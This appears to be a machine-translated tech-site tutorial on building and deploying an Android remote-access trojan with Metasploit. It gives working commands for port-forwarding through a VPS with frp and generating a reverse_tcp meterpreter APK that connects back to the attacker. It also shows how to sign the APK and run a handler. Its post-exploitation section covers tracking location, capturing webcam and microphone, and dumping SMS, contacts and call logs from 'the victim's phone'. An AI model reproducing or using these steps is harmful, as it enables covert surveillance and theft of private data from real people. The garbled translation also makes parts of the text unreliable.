Shulou(Shulou.com)06/01 Report--

Through Metasploit how to remotely control Android devices, I believe that many inexperienced people are at a loss about this. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Metasploit module used in Android system

As shown in the following figure, you can see that there are several payload that can be used under Android:

Port mapping scheme

If our phone is on the same local area network as the computer used by the attacker, the victim's phone can directly access the attacker's computer, thus eliminating the need for port mapping. But in reality, in the vast majority of cases, the victim's mobile phone is located in the external network or in a different internal network from the attacker, and the attacker's computer is in an intranet environment, so the victim's mobile phone cannot directly access the attacker's computer, so port mapping is needed, that is, the attacker's port is mapped to the vps on the public network. The victim's mobile phone can indirectly access the attacker's computer on the intranet by accessing the public network vps.

A simpler solution: now that you have vps, why not just use vps as an attack machine? It is easy to install metasploit directly on vps, generate Trojans and directly control the victim's mobile phone. But here we still use port mapping.

Frp

We first use the frp tool to achieve port mapping, and use the attack machine kali in the internal network to realize the intrusion to the Android machine in the external network.

Experimental environment:

Target Android device

Public network vps (centos)

Intranet attack aircraft kali

The main idea is:

The public network vps runs frp server

Local kali runs frp client

Map kali local port to public network vps

1. VPS server:

Use vps as the frp server and execute. / frps-c. / frps.ini. The server configuration frps.ini is as follows:

[common] bind_port = 7000 # this is the default. You can change it or not.

two。 Client:

Use the private network attack machine kali as the frp client, and the configuration frps.ini of the client is as follows:

[common] server_addr = 39.xxx.xxx.210 # here is the ipserver_port of the public network vps = 7000 # the port here should be the same as that of the server [msf] type = tcplocal_ip = 127.0.0.1 local_port = 4444 # forward the data arriving at the frp server to the local port 4444 remote_port = 2333 # port 2333 on the server side

The client establishes a connection through vps's IP and 7000 listening port, and transmits the data of public network port 2333 to the local port 4444.

After configuration, execute. / frpc-c. / frpc.ini to start the client:

At this point, the frp is configured, and the next step is to generate Trojans.

Metasploit generates Trojan Horse

Use Metasploit to generate an apk containing an Android of malicious Payload. Open a new window in Kali Linux and enter:

Msfvenom-p android/meterpreter/reverse_tcp LHOST=39.xxx.xxx.210 (vps public network ip) LPORT=2333 (public network) R > shell.apk

Apply a signature for apk

We have successfully created a payload for the Android format (APK) file. However, Android mobile devices generally do not allow applications that do not have a properly signed certificate to be installed. Android devices install only APK with signed files. We can sign manually using the following tools:

KeytoolJARsignerzipalign

Of these three software, the first two are built into Kali, and the third needs to be installed (in the new version of kali, JARsigner also needs to install apt-get install openjdk-13-jdk-headless on its own)

Step 1: use keytool to generate a key file. It will let you enter the name, organization, address and other information of the key, and eventually generate a key file.

Keytool-genkey-v-keystore my-release-key.Keystore-alias alias_name-keyalg RSA-keysize 2048-validity 10000

Feel free to fill in whatever you are asked above, but be careful not to enter yes to type y, or you will keep asking.

As shown below, generate a key file:

Step 2: use the key file with JARsigner to sign the APK

Jarsigner-verbose-sigalg SHA1withRSA-digestalg SHA1-keystore my-release-key.Keystore shell.apk alias_name

Step 3: then use JARsigner to verify the signature

Jarsigner-verify-verbose-certs shell.apk

At this point, the signing process is complete, and the shell.apk can be used in Android.

Turn on Metasploit to monitor

Use metasploit to listen on ports that accept data locally

Msfconsoleuse exploit/multi/handlerset payload android/meterpreter/reverse_tcp set LHOST 127.0.0.1set LPORT 4444exploit

Then send the APK containing payload to the phone to install and start, and you can get a session on the phone on the msf:

Here, some phones get the session automatically disconnected for a while, I do not know why, I think of a solution is: as soon as I get the session, immediately execute webcam_stream to open the remote video, and then disconnect the video, session will be stable, will not be disconnected, I do not know why!

After we have obtained the Meterpreter permission of the target Android phone, we can execute the following command to conduct a post-penetration attack

Post-penetration attack

Check to see if the phone has been root

Check_root

Control the target phone to send text messages

Send_sms-d some mobile phone number-t "hello"

View system information

Sysinfo

Locate the phone.

Wlan_geolocate / / use WLAN information to obtain current geographic location geolocate / / use geolocation (GPS) to obtain current LAT

This command outputs the longitude and latitude of the phone, according to which we can know the location of the phone; there is also a URL that opens to show the location of the phone on Google Maps. But this site needs to surf the Internet scientifically, so we can locate this longitude and latitude directly on Google Earth:

There is no need to say the accuracy, accurate to the building number. (the above longitude and latitude are obtained by geolocate)

Call the cell phone camera

Webcam_list / / list webcam webcam_snap 1/2webcam_chat / / start video chat webcam_snap / / take snapshot from specified camera webcam_stream-I 1 / / play video stream from specified webcam

Call the microphone

Record_mic-d x / / recording audio from the default microphone is X seconds

This command defaults to recording the audio recorded by the default microphone for 1 second and will try to play the captured audio wav file with an inaccurate parameter.

Get communication record information

Dump_calllog / / download the call history on the target phone dump_contacts / / get the contact list dump_sms / / get SMS

As shown above, the communication records, contact lists and text messages are saved to the attacker's local file.

Give me a more interesting one. Now let me force the wall pattern of my phone to be modified remotely. Continue to enter commands as follows:

Msf > use post/multi/manage/set_wallpapermsf post (set_wallpaper) > set WALLPAPER_FILE / root/5.jpgmsf post (set_wallpaper) > set session 1msf post (set_wallpaper) > exploit

5.jpg is as follows:

Execute the module and replace it successfully:

More commands are as follows:

Execute executes a command getuid to get the local date and time of the currently running user localtime display target system pgrep filter process by name ps lists the running process user interface command = = screenshare real-time monitoring remote user's desktop screenshot capture interactive desktop screenshot audio output command = play plays waveform audio file (.wav) application controller life on the target system Order = = app_install request installation apk file app_list lists the name of the installed application app_run startup package on the device the main activity app_uninstall request uninstalls the apk file after reading the above Do you know how to remotely control Android devices through Metasploit? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.